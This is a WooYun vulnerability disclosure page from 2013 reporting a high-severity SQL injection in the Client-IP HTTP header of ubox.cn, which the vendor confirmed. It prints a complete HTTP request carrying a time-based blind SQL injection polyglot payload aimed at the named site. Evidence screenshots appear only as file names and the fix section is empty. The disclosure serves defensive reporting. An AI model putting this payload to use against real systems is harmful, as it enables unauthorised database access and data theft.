当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-041610

漏洞标题:友宝在线##sql注入之http头部Client-IP

相关厂商:友宝在线

漏洞作者: PgHook

提交时间:2013-10-31 17:50

修复时间:2013-12-15 17:51

公开时间:2013-12-15 17:51

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-10-31: 细节已通知厂商并且等待厂商处理中
2013-11-01: 厂商已经确认,细节仅向厂商公开
2013-11-11: 细节向核心白帽子及相关领域专家公开
2013-11-21: 细节向普通白帽子公开
2013-12-01: 细节向实习白帽子公开
2013-12-15: 细节向公众公开

简要描述:

一般人都会放弃的。

详细说明:

首先对厂商表示抱歉,给你们造成了不好的影响。
漏洞站点:www.ubox.cn
post信息:

GET /apply/req2.html HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Client-IP: if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/
X-Requested-With: XMLHttpRequest
Referer: http://www.ubox.cn:80/
Cookie: PHPSESSID=998fjt8152i70j3eitrgkamsi0
Host: www.ubox.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*


漏洞字段:Client-IP

y1.jpg


漏洞证明:

y2.jpg


y3.jpg


修复方案:

。。。。。。

版权声明:转载请注明来源 PgHook@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2013-11-01 13:55

厂商回复:

感谢您对友宝安全的关注,希望以后继续提出宝贵意见

最新状态:

暂无